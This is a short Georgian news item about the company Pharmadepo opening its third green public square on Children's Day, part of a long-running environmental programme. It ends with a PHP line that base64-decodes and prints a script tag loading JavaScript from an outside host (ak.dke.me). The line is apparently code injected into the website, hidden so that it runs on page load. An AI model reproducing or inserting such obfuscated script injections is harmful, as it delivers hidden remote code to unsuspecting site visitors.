celsiusi
ავერსი საქკაბელი
„ფარმადეპო“ განაგრძობს სოციალურ პროექტს – გამწვანებული სკვერი ჯანსაღი გარემოსთვის, რომლის ფარგლებშიც კომპანიამ გახსნა უკვე რიგით მესამე სკვერი. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს „ფარმადეპოდან“ აცნობეს.
 
„აღსანიშნავია, რომ სკვერის გახსნა მოხდა პირველ ივნისს, ბავშვთა დაცვის დღეს. ჩვენი საზოგადოებისთვის და განსაკუთრებით, ბავშვებისთვის უმნიშვნელოვანესია ჯანსაღი გარემო,  შესაბამისად ეს პროექტი, რომელიც კომპანია „ფარმადეპომ“ დანერგა, აუცილებლად დაეხმარება ბავშვებს ისწავლონ გარემოზე ზრუნვა. ამიტომაც,  ჩვენ ეს სკვერი მივუძღვენით ბავშვებს, მათ ვისაც ყველაზე მეტად სჭირდებათ ზრუნვა და გვჯერა, რომ ზრუნვით იცვლება სამყარო“– განაცხადეს კომპანიაში. 
 
ცნობისთვის, „ფარმადეპო“ უკვე 14 წელია, კორპორატიული სოციალური პასუხისმგებლობის ფარგლებში გარემოს დაცვისკენ მიმართულ აქტივობებს ახორციელებს, რომლის მიზანიც საზოგადოების ჩართვაა გარემოს დაცვით პროცესებში, როგორიცაა დასუფთავება, გარემოს გამწვანება — მცენარეების დარგვა და მოვლა, პოლიეთილენის მოხმარების შემცირება.  
 
 
 
1071
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");